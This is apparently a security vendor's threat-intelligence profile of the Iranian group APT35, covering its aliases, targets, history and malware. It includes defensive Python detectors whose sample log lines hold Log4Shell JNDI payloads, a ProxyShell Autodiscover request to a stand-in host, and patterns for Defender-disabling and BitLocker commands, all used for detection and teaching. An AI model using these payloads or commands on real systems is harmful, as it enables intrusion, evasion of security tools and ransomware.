> threat_actor APT35 —— origin: Iran (IRGC) —— alias: Charming Kitten / Magic Hound / Mint Sandstorm —— active since: 2014
APT35 — tracked under an unusually long list of aliases including Charming Kitten, Magic Hound, Mint Sandstorm, Phosphorus, TA453, Cobalt Illusion, Newscaster, ITG18, Yellow Garuda, and Educated Manticore — is an Iranian state-sponsored cyber espionage group that has been conducting operations since at least 2014. The group is assessed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC), conducting long-term, resource-intensive operations to collect strategic intelligence in support of Iranian geopolitical objectives.
APT35 is arguably the most versatile threat actor in Iran's cyber arsenal. While most state-sponsored groups occupy a defined niche — targeting specific sectors or employing specific techniques — APT35 operates across the full spectrum: from patient social engineering campaigns impersonating journalists and academics, to rapid mass exploitation of critical vulnerabilities like ProxyShell and Log4Shell within days of public disclosure, to ransomware deployment using BitLocker and DiskCryptor. This breadth of capability reflects a large, well-resourced operational structure with specialised teams for different functions.
This versatility is confirmed by a remarkable event in late 2025: an anonymous leak of APT35's internal operational documents — published on GitHub under the alias 'KittenBusters' — exposed personnel rosters, daily work logs, attack reports, malware projects, and operational playbooks. The leak, analysed by CloudSEK, Gatewatcher, and other researchers, revealed a disciplined, bureaucratic operation with distinct teams for penetration testing, malware development, social engineering, and infrastructure management. Monthly performance reports documented operators' daily tasks, including social media monitoring, OSINT collection, and phishing infrastructure maintenance.
| Attribute | Detail |
|---|---|
| Tracked Names | APT35 (Mandiant/FireEye), Charming Kitten (ClearSky/CERTFA), Magic Hound (MITRE), Mint Sandstorm (Microsoft, current), Phosphorus (Microsoft, legacy), TA453 (Proofpoint), Cobalt Illusion (Secureworks), Newscaster / Newscaster Team (iSIGHT), ITG18 (IBM X-Force), Yellow Garuda (PwC), Educated Manticore (Check Point), TunnelVision, TEMP.Beanie, Tarh Andishan, Timberworm, UNC788, Agent Serpens |
| State Sponsor | Islamic Republic of Iran — Islamic Revolutionary Guard Corps (IRGC). The IRGC is a military organisation, answerable directly to the Supreme Leader, whose mandate is to protect the Iranian regime. APT35's operations align with IRGC intelligence requirements: monitoring foreign threats, collecting strategic intelligence on adversary nations, and tracking dissidents and regime opponents. |
| Active Since | At least 2014, with precursor activity (Newscaster social media campaign targeting US military) traced to 2011. The Parastoo persona's 2012 hack of an IAEA server was later linked to the group. Continuous operations observed through 2024–2025, including BellaCPP malware deployment and the leaked operational documents. |
| Sanctioned Individuals | Since 2020, the US Treasury's Office of Foreign Assets Control (OFAC) has sanctioned IRGC-linked cyber personnel, including individuals tied to APT35 operations. The leaked 2025 documents identify Abbas Rahrovi (alias Abbas Hosseini) as a reported operational leader. Named individuals also include Behzad Mesri (linked to the 2017 HBO breach and IRGC operations) and others identified in US DOJ indictments. |
| Relationship to APT42 | APT35 and APT42 were separated by Mandiant in 2022 as distinct groups. Both are IRGC-affiliated but serve different mandates: APT35 conducts long-term, resource-intensive operations against military, diplomatic, government, and energy targets. APT42 focuses on surveillance of individuals — journalists, academics, dissidents. They share some historical infrastructure but operate independently. |
APT35 primarily targets entities in the United States, United Kingdom, Israel, and Saudi Arabia, but campaigns have reached Germany, Iraq, Australia, South Korea, Kuwait, Turkey, Lebanon, Jordan, Afghanistan, and Iran itself (internal dissidents). Their targeting reflects Iranian strategic priorities: understanding adversary military capability, monitoring nuclear policy, tracking dissident activity, and collecting economic intelligence.
| Sector | Strategic Value | Notable Campaigns |
|---|---|---|
| Government and Military | Foreign policy intelligence, military capability assessment, diplomatic positioning, sanctions planning. Direct intelligence value to IRGC strategic decision-making. | Targeted US and European government personnel. Middle Eastern government agencies including Jordan's Ministry of Justice. Afghan government ministries (Tribal Affairs, Refugees). Saudi and Israeli government entities. Leaked documents reveal ProxyShell exploitation folders for Iran, South Korea, Kuwait, Turkey, Saudi Arabia, and Lebanon. |
| Defence Industrial Base | Weapons systems intelligence, military technology, supply chain information. Supports Iran's domestic military development and understanding of adversary capability. | Sustained targeting of US and Middle Eastern defence organisations. Engineering and business services associated with defence programmes. |
| Energy and Oil & Gas | Iran's economy is oil-dependent. Intelligence on competitor production, pricing strategy, and infrastructure supports economic planning. Energy infrastructure intelligence also supports potential disruptive operations. | Targeting of energy sector organisations across the Middle East and globally. Leaked operational documents confirm energy as a priority targeting sector. |
| Media and Academics | Journalists and researchers covering Iran, nuclear policy, and Middle Eastern affairs shape public narrative and influence Western policy. Their communications reveal sources, analysis, and unpublished intelligence. | 2011 Newscaster campaign targeting US military via fake journalist personas on social media. Ongoing impersonation of academics and think tank researchers. Targeting of entities including the World Health Organization (WHO). |
| Telecommunications | Communications infrastructure provides access to metadata and content. Compromised telecoms support broader surveillance objectives against targeted individuals and organisations. | Afghan telecommunications systems targeted as part of Operation Afghan Infiltration (2021). Telecoms targeting across the Middle East and South Asia. |
| Legal Services and NGOs | Law firms working on Iran-related cases, sanctions enforcement, and human rights documentation hold strategically valuable information. NGOs tracking regime abuses are direct regime opponents. | Operation Desert Breach targeting Jordan's legal sector, with over 74 GB of data exfiltrated and complete system mapping of law firm networks. Western NGO targeting for cloud-based document exfiltration. |
APT35's evolution over the past decade tracks the broader maturation of Iranian cyber capabilities — from unsophisticated social engineering to rapid adoption of critical vulnerability exploits, custom malware development, and even ransomware operations. Understanding this evolution is essential for assessing their current threat level.
| Period | Capability | Significance |
|---|---|---|
| 2011–2014 | Social media manipulation and basic phishing. The Newscaster campaign created elaborate fake personas on Facebook, LinkedIn, and Twitter impersonating journalists and defence analysts to befriend US military personnel and harvest intelligence. Basic spear-phishing against Gmail accounts of Iranian journalists and activists. | Established the social engineering tradecraft that remains APT35's foundation. Demonstrated that human manipulation could bypass all technical controls. Provided a template later refined by APT42. |
| 2015–2017 | Expanded spear-phishing with credential harvesting pages mimicking Google, Yahoo, and Microsoft login portals. Impersonation of journalists from major Western outlets. 2016 Telegram incident that exposed approximately 15 million Iranian users' phone numbers and compromised a number of accounts by intercepting SMS login codes. Use of Android malware for mobile surveillance. | Scaled operations significantly. Mobile surveillance capability added. Demonstrated ability to abuse a major messaging platform at scale and to defeat SMS-based authentication. |
| 2018–2020 | Development of custom tooling including HYPERSCRAPE for large-scale email extraction. Targeting of COVID-19 vaccine research and pharmaceutical organisations from March 2020. Microsoft seized 99 APT35 domains in 2019, temporarily disrupting infrastructure. | Increased technical sophistication with custom tools. Demonstrated ability to adapt targeting to emerging events (COVID-19). Resilient to infrastructure takedowns — rebuilt and continued. |
| 2021–2022 | Rapid exploitation of ProxyShell (Exchange) and Log4Shell (Log4j) vulnerabilities within days of disclosure. Automated initial access using ProxyShell. Deployment of ransomware using BitLocker and DiskCryptor. PowerLess backdoor and Fast Reverse Proxy (FRP) for persistence and lateral movement. Overlap with TunnelVision activity. | Marked a fundamental shift: from patient social engineering to rapid mass exploitation. Ransomware capability represented either monetisation or destructive/coercive potential. Demonstrated ability to weaponise fresh vulnerabilities at speed. |
| 2023–2025 | BellaCiao malware — a customised dropper where each sample contains hardcoded victim-specific information (company names, subdomains, public IPs). BellaCPP variant rewritten in C++ for enhanced evasion. Exploitation of CVE-2024-1709 (ConnectWise ScreenConnect). Supply-chain pivots through managed service providers. | Current peak capability. Victim-specific malware customisation indicates detailed pre-compromise intelligence gathering. C++ rewrite demonstrates investment in evasion. Supply-chain focus mirrors global trend in sophisticated threat groups. |
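The 2021–2022 row above is where rapid exploitation enters APT35's repertoire, so it is worth showing what the two named vulnerabilities look like in web-server logs. The Python below is an added example written for this page, not code from any vendor report or from the group's leaked tooling. It flags Log4Shell JNDI lookups, including the nested-lookup and URL-encoding obfuscations that defeated naive `${jndi:` string matching, and ProxyShell-style requests that abuse the Exchange Autodiscover endpoint to reach a back-end path. The log lines, IP addresses (RFC 5737 ranges) and hostnames are constructed; the request shapes are the publicly documented ones, not specific APT35 indicators.

```python
import re
from urllib.parse import unquote

# Log4j lookup forms used to hide the literal string "${jndi:" from naive matching:
#   ${lower:j} / ${upper:j}      -> "j"
#   ${env:UNSET:-j} / ${::-j}    -> the default value "j"
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)


def normalize_lookups(text, max_rounds=10):
    """Collapse nested Log4j lookups to a fixpoint so that obfuscated payloads
    reduce to the same canonical form as a plain ${jndi:...} string."""
    text = unquote(unquote(text))  # undo single or double URL encoding
    for _ in range(max_rounds):
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def is_log4shell(text):
    """True if the field carries a JNDI lookup once obfuscation is stripped."""
    return "${jndi:" in normalize_lookups(text)


# ProxyShell's first stage abuses the Exchange Autodiscover front end: an '@'
# in the query makes it forward the request to an arbitrary back-end path.
_BACKEND_PATHS = ("/powershell", "/mapi/nspi", "/ews/", "/owa/")


def is_proxyshell(path):
    """True for Autodiscover requests that route to a back-end endpoint via '@'.
    A normal Autodiscover request also contains '@' (the mailbox address), so
    the check requires a back-end path after it, not just the character."""
    path = unquote(path).lower()
    if "/autodiscover/autodiscover.json" not in path or "@" not in path:
        return False
    after_at = path.split("@", 1)[1]
    return any(b in after_at for b in _BACKEND_PATHS)


# Combined Log Format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def triage(lines):
    """Return [(line_number, rule, source_ip)] for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _CLF.match(line)
        if not m:
            continue
        if is_proxyshell(m["path"]):
            hits.append((n, "proxyshell_autodiscover_ssrf", m["ip"]))
        # JNDI payloads can sit in any logged, attacker-controlled field;
        # the User-Agent header was the most common carrier in December 2021.
        for field in ("path", "referer", "ua"):
            if is_log4shell(m[field]):
                hits.append((n, "log4shell_jndi_lookup", m["ip"]))
                break
    return hits


# Constructed access-log lines (RFC 5737 documentation addresses, made-up hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.8 - - [12/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://203.0.113.8/x}"',
    '198.51.100.4 - - [09/Aug/2021:11:02:51 +0000] '
    '"GET /autodiscover/autodiscover.json?@evil.example/powershell HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [09/Aug/2021:11:03:00 +0000] '
    '"GET /autodiscover/autodiscover.json?Email=user@corp.example&Protocol=Autodiscoverv1 HTTP/1.1" '
    '200 0 "-" "Outlook/16.0"',
    '192.0.2.11 - - [12/Dec/2021:03:15:00 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

The Autodiscover rule deliberately requires a back-end path after the `@`, because legitimate Autodiscover traffic carries the mailbox address and would otherwise page the on-call for every Outlook client; the fourth sample line is there to show the rule staying quiet for that case.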
| Tool | Type | Capabilities |
|---|---|---|
| BellaCiao / BellaCPP | Custom dropper/loader | Named after the Italian resistance folk song. BellaCiao delivers additional malware payloads based on C2 instructions. Each sample is customised for specific victims with hardcoded company names, subdomains, and IP addresses. Disables Microsoft Defender via PowerShell. Creates persistence through service instances masquerading as legitimate Exchange services. Deploys web shells and IIS backdoors. BellaCPP (2024) is a C++ rewrite enhancing evasion and complexity. |
| PowerLess | Custom PowerShell backdoor | Discovered by Cybereason in 2022. PowerShell-based backdoor providing command execution, file transfer, keylogging, browser credential theft, and screenshot capture. Designed for stealth: it runs PowerShell inside a .NET host process rather than spawning powershell.exe, sidestepping defences keyed on that executable, and avoids dropping executable files to disk. |
| HYPERSCRAPE | Custom email extraction tool | Purpose-built for large-scale, stealthy email exfiltration from compromised webmail accounts. Systematically downloads email content from Gmail, Yahoo, and Microsoft Outlook accounts using stolen credentials. Initially observed targeting Iranian dissidents. |
| GorjolEcho | Custom remote backdoor | Delivered through a multi-stage chain: phishing link → Google Apps Script macro → Dropbox URL → password-protected RAR → dropper using PowerShell and LNK → cloud-hosted stager → GorjolEcho. Capable of receiving and executing operator commands. Delivery chain leverages legitimate cloud services to bypass security controls. |
| Fast Reverse Proxy (FRP) | Open-source tool (repurposed) | Legitimate open-source tunnelling tool used extensively by APT35 to proxy RDP, exposing remote desktop on compromised systems to the operators through restrictive egress firewalls. Deployed alongside custom malware for persistent access. |
| BitLocker / DiskCryptor | Legitimate encryption tools (weaponised) | Used for ransomware operations. APT35 exploits ProxyShell to gain access, deploys web shells, then uses the built-in BitLocker feature or the open-source DiskCryptor full-disk encryption tool to encrypt victim systems. Represents either monetisation, coercion, or destructive capability; intent varies by campaign. |
| Credential Harvesting Infrastructure | Custom phishing platforms | Cloned login pages for Google, Microsoft, Yahoo, and organisation-specific portals. Typosquatted domains mimicking think tanks, media outlets, and conference sites. Real-time relay of one-time MFA codes entered into the phishing page, defeating SMS and authenticator-app second factors. Multi-persona email threads for enhanced social engineering credibility. |
| Android Malware | Custom mobile surveillance | Mobile implants capable of call recording, SMS interception, GPS tracking, and multimedia exfiltration. Delivered via SMS links and masquerading as legitimate VPN applications. Targets Iranian diaspora and dissidents for IRGC domestic surveillance. |
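The MFA interception in the table above works because a one-time code is a bare secret that the victim can be induced to type anywhere. The added example below, written for this page and not code from APT35 reporting or from any vendor, contrasts that with the origin binding that makes WebAuthn phishing-resistant. It assumes a hypothetical relying party `thinktank.example` with a constructed lookalike `login.thinktank-example.com`; the authenticator is a stand-in that uses HMAC with a per-credential secret instead of a real asymmetric key pair, so it runs on the standard library. A relayed TOTP is accepted by the real site, while an assertion ceremony from the lookalike origin is refused by a conforming browser and, even if a non-conforming client produced one, rejected by the RP because the signed clientDataJSON carries the wrong origin.

```python
import base64, hashlib, hmac, json, os, struct
from urllib.parse import urlparse

# Constructed scenario: a hypothetical think-tank portal and a lookalike domain.
RP_ID = "thinktank.example"
LEGIT_ORIGIN = "https://login.thinktank.example"
PHISH_ORIGIN = "https://login.thinktank-example.com"


def sha256(data):
    return hashlib.sha256(data).digest()


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# --- TOTP (RFC 6238): the kind of second factor a real-time relay page captures ---
def totp(secret, t, step=30, digits=6):
    counter = struct.pack(">Q", int(t) // step)
    d = hmac.new(secret, counter, hashlib.sha1).digest()
    off = d[-1] & 0x0F
    code = struct.unpack(">I", d[off:off + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def rp_verify_totp(secret, code, t, skew_steps=1):
    """Accept the current step plus one either side. Nothing here knows where
    the victim typed the code: it is valid wherever it is relayed from."""
    return any(hmac.compare_digest(totp(secret, t + k * 30), code)
               for k in range(-skew_steps, skew_steps + 1))


def scenario_totp_relay(secret, t=1_700_000_000):
    """Victim enters the code on the lookalike page; the proxy forwards it to the
    real portal five seconds later. Returns whether the real RP accepts it."""
    code_typed_at_phish = totp(secret, t)
    return rp_verify_totp(secret, code_typed_at_phish, t + 5)


# --- WebAuthn assertion (simplified): the origin is inside the signed client data ---
class Authenticator:
    """Stand-in for a FIDO2 authenticator. Real devices sign with a per-credential
    private key; HMAC with a per-credential secret is used here so the example runs
    on the standard library. The data signed over has the same shape."""

    def __init__(self):
        self.creds, self.counter = {}, 0

    def make_credential(self, rp_id):
        self.creds[rp_id] = os.urandom(32)
        return self.creds[rp_id]  # plays the role of the public key handed to the RP

    def get_assertion(self, rp_id, client_data):
        self.counter += 1
        auth_data = sha256(rp_id.encode()) + b"\x01" + struct.pack(">I", self.counter)
        sig = hmac.new(self.creds[rp_id], auth_data + sha256(client_data), hashlib.sha256).digest()
        return auth_data, sig


def browser_get_assertion(authn, origin, rp_id, challenge):
    """What a conforming browser does: refuse the ceremony unless rp_id is the
    origin's host or a registrable suffix of it, then record the actual origin
    in clientDataJSON, which the authenticator signs over."""
    host = urlparse(origin).hostname
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError(f"rpId {rp_id!r} is not valid for origin {origin!r}")
    client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                              "origin": origin}).encode()
    auth_data, sig = authn.get_assertion(rp_id, client_data)
    return client_data, auth_data, sig


def rp_verify_assertion(cred_key, challenge, client_data, auth_data, sig):
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != b64url(challenge):
        return False
    if cd.get("origin") != LEGIT_ORIGIN:  # the check that makes this phishing-resistant
        return False
    if auth_data[:32] != sha256(RP_ID.encode()):  # rpIdHash must be ours as well
        return False
    expected = hmac.new(cred_key, auth_data + sha256(client_data), hashlib.sha256).digest()
    return hmac.compare_digest(sig, expected)


def scenario_webauthn(origin):
    """One assertion ceremony from `origin` against the legitimate RP, with the proxy
    relaying the RP's genuine challenge exactly as it relayed the OTP.
    Returns (browser_allowed_ceremony, rp_accepted_assertion)."""
    authn = Authenticator()
    cred_key = authn.make_credential(RP_ID)
    challenge = os.urandom(32)
    try:
        client_data, auth_data, sig = browser_get_assertion(authn, origin, RP_ID, challenge)
    except PermissionError:
        # Model a non-conforming client that signs anyway; it still records the
        # origin it actually runs on, and the RP rejects that origin.
        client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                                  "origin": origin}).encode()
        auth_data, sig = authn.get_assertion(RP_ID, client_data)
        return False, rp_verify_assertion(cred_key, challenge, client_data, auth_data, sig)
    return True, rp_verify_assertion(cred_key, challenge, client_data, auth_data, sig)


if __name__ == "__main__":
    seed = b"12345678901234567890"
    print("relayed TOTP accepted:", scenario_totp_relay(seed))            # True
    print("WebAuthn from real origin:", scenario_webauthn(LEGIT_ORIGIN))  # (True, True)
    print("WebAuthn from lookalike:", scenario_webauthn(PHISH_ORIGIN))    # (False, False)
```

The point is in `rp_verify_totp` versus `rp_verify_assertion`: the first has no input that could tell it where the code was typed, so a relay within the skew window always wins; the second receives the origin as part of what the authenticator signed, so the relay cannot launder the lookalike domain into the legitimate one.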
APT35 maintains two fundamentally different initial access strategies: patient, persona-driven social engineering against high-value individuals, and rapid exploitation of freshly disclosed vulnerabilities for mass access. Which one is used depends on the target's value and the operational timeline, and a defence that addresses only one of them leaves the other path open.
APT35's use of BitLocker and DiskCryptor for ransomware operations — documented from late 2021 onwards — raised questions about whether an espionage group had diversified into financially motivated crime or whether the ransomware served a different purpose. The answer appears to be: both, depending on the campaign.
In some cases, the ransomware activity overlaps with a sub-group tracked as Nemesis Kitten (UNC2448/DEV-0270/COBALT MIRAGE), which Microsoft and others assess may have ties to the IRGC Intelligence Organization (IRGC-IO). This sub-group conducted widespread scanning for vulnerabilities and deployed BitLocker for encryption, potentially for financial gain to fund IRGC operations, or as cover for destructive operations that could be attributed to criminals rather than the Iranian state. The Memento ransomware variant also showed TTP overlaps with APT35 infrastructure, though direct attribution remains contested.
For defenders, the operational implication is clear: an APT35 intrusion that begins as espionage may end with ransomware deployment. The same access that enables data exfiltration also enables encryption. Organisations compromised by APT35 face a dual threat — their data may be stolen and their systems may be encrypted, and these outcomes are not mutually exclusive.
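The BellaCiao row in the tools table and the ransomware discussion above describe the same host-level sequence: security tooling disabled from PowerShell, a service registered under an Exchange-sounding name, and then, in the worst case, disk encryption turned on. The Python below is an added example, written for this page and not code from APT35 reporting or any vendor, that runs three such rules over constructed Windows event records and escalates a host where Defender tampering is followed by encryption enablement inside a 24-hour window. Assumptions: events arrive as flattened dictionaries with the field names used here (an export shape, not a Windows standard); the legitimate Exchange install root is the default `C:\Program Files\Microsoft\Exchange Server\`; and DiskCryptor's kernel driver is `dcrypt.sys`, the file name used by the DiskCryptor project. The service names and paths in the sample are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Default Exchange install root (assumption; adjust for non-default installs).
EXCHANGE_DIR = "c:\\program files\\microsoft\\exchange server\\"

# Event 4104 script blocks that switch Defender off or carve out exclusions.
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\b.*?-disable\w+\s+(\$true|1)"
    r"|add-mppreference\b.*?-exclusion(path|process|extension)",
    re.IGNORECASE | re.DOTALL,
)
# Event 4688 command lines / 4104 script blocks that turn BitLocker on.
BITLOCKER_ENABLE = re.compile(r"manage-bde(\.exe)?\s+[-/]on\b|enable-bitlocker\b", re.IGNORECASE)
ENCRYPTION_RULES = ("bitlocker_enable", "diskcryptor_driver_install")


def classify(ev):
    """Return the rule an event trips, or None."""
    eid = ev["event_id"]
    if eid == 4104 and DEFENDER_TAMPER.search(ev["script_block"]):
        return "defender_tamper"
    if eid == 7045:  # new service installed
        image = ev["image_path"].lower().strip('"')
        if "exchange" in ev["service_name"].lower() and not image.startswith(EXCHANGE_DIR):
            return "masquerading_exchange_service"
        if image.endswith("dcrypt.sys"):  # DiskCryptor driver (assumed file name)
            return "diskcryptor_driver_install"
    text = ev.get("command_line") or ev.get("script_block") or ""
    if eid in (4688, 4104) and BITLOCKER_ENABLE.search(text):
        return "bitlocker_enable"
    return None


def triage(events, window_hours=24):
    """Per-host alerts. A host where Defender tampering is followed by encryption
    enablement inside the window is escalated to critical: the access used for
    exfiltration is being turned into a ransomware outcome."""
    per_host = defaultdict(list)
    for ev in events:
        rule = classify(ev)
        if rule:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), rule))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        tamper = [t for t, r in hits if r == "defender_tamper"]
        enc = [t for t, r in hits if r in ENCRYPTION_RULES]
        escalate = any(0 <= (e - t).total_seconds() <= window_hours * 3600
                       for t in tamper for e in enc)
        alerts[host] = {"severity": "critical" if escalate else "high",
                        "rules": [r for _, r in hits]}
    return alerts


# Constructed event records, not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2023-04-10T02:11:05", "host": "EXCH01", "event_id": 4104,
     "script_block": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2023-04-10T02:11:40", "host": "EXCH01", "event_id": 7045,
     "service_name": "Microsoft Exchange Services Health",
     "image_path": r"C:\Users\Public\exchsvc\ExchangeHealth.exe"},
    {"ts": "2023-04-10T02:30:00", "host": "EXCH01", "event_id": 7045,  # legitimate
     "service_name": "Microsoft Exchange Health Manager",
     "image_path": r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMHost.exe"},
    {"ts": "2023-04-10T03:40:00", "host": "EXCH01", "event_id": 4688,
     "command_line": "manage-bde.exe -on C: -RecoveryPassword -UsedSpaceOnly"},
    {"ts": "2023-04-10T09:00:00", "host": "WKS-HR-07", "event_id": 4104,  # benign query
     "script_block": "Get-MpPreference | Select DisableRealtimeMonitoring"},
    {"ts": "2023-04-10T09:05:00", "host": "WKS-HR-07", "event_id": 7045,
     "service_name": "dcrypt", "image_path": r"C:\Windows\System32\drivers\dcrypt.sys"},
]

if __name__ == "__main__":
    for host, alert in triage(SAMPLE_EVENTS).items():
        print(host, alert)
```

The masquerade rule keys on the display name rather than the binary name because the page's point is that the service looks like Exchange: anything Exchange-like whose image path is outside the install root deserves a look, and the legitimate MSExchangeHMHost entry in the sample shows the rule staying quiet for the real thing. The correlation window is the operational reading of the paragraph above: the same compromised host moving from tampering to encryption within a day is espionage access becoming a ransomware event.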
APT35's versatility — social engineering, vulnerability exploitation, custom malware, cloud-native operations, ransomware — requires a correspondingly broad defensive posture: human-layer controls against impersonation and credential phishing, infrastructure-layer controls against rapid exploitation of newly disclosed vulnerabilities, and detection of the persistence and encryption activity that both intrusion paths lead to. No single control addresses the full range of their capabilities.
The relationship between APT35 and APT42 causes persistent confusion in threat intelligence reporting, exacerbated by the fact that both groups share the 'Charming Kitten' label in some vendor taxonomies. Understanding the distinction is operationally important because the two groups pose different threats requiring different defences.
| Attribute | APT35 | APT42 |
|---|---|---|
| Mandate | Long-term, resource-intensive strategic intelligence collection against organisations. Government, military, defence, energy, infrastructure. | Surveillance and monitoring of individuals. Journalists, academics, dissidents, political figures, human rights workers. |
| Initial Access | Dual capability: patient social engineering for high-value targets, rapid vulnerability exploitation for mass access. | Almost exclusively social engineering. Weeks of trust-building before credential harvest. Rarely exploits technical vulnerabilities. |
| Post-Compromise | Network penetration, Active Directory compromise, custom malware deployment, lateral movement, data exfiltration, potential ransomware. Infrastructure-focused operations. | Personal account access — email, cloud storage, contacts. Mobile surveillance. Individual-focused collection. Rarely deploys malware beyond credential harvesting. |
| Targets | Organisations: government agencies, defence contractors, energy companies, telecoms, academic institutions. | Individuals: specific people within those organisations, plus journalists, activists, diaspora members, and political campaign staff. |
| Scale | Large campaigns — mass vulnerability exploitation affecting dozens of organisations simultaneously. | Narrow campaigns — typically fewer than a dozen targets per campaign, each approached individually. |
APT35 is one of the most capable and versatile threat groups in the Iranian cyber arsenal. Operating on behalf of the IRGC since at least 2014, they have evolved from social media manipulation campaigns to sophisticated operations spanning targeted social engineering, rapid mass exploitation of critical vulnerabilities, custom malware development, cloud-native espionage, and ransomware deployment. Their target set — government, military, defence, energy, media, legal services, and academia — spans the full range of Iranian strategic intelligence requirements.
The 2025 leak of their internal operational documents confirms what security researchers have long assessed: APT35 is not a loose collection of hackers but a disciplined, bureaucratic operation with distinct functional teams, daily work logs, monthly performance reports, and systematic exploitation of disclosed vulnerabilities. The leaked ProxyShell target folders covering six countries illustrate the scale of their operations.
For organisations in APT35's target sectors, the defensive challenge is the group's breadth. They can compromise you through a carefully crafted phishing email impersonating a journalist, or through automated exploitation of an unpatched Exchange server — and both attack paths lead to the same outcome: persistent access, data exfiltration, and potentially ransomware. Defending requires both human-layer controls (awareness, verification, phishing-resistant MFA) and infrastructure-layer controls (aggressive patching, monitoring, network segmentation). APT35's versatility demands equally versatile defence.
Our threat intelligence assessments evaluate your exposure to specific nation-state threat groups based on your sector, geography, partnerships, and public profile. We identify which groups are most relevant to your risk and recommend targeted, prioritised defences against their documented techniques.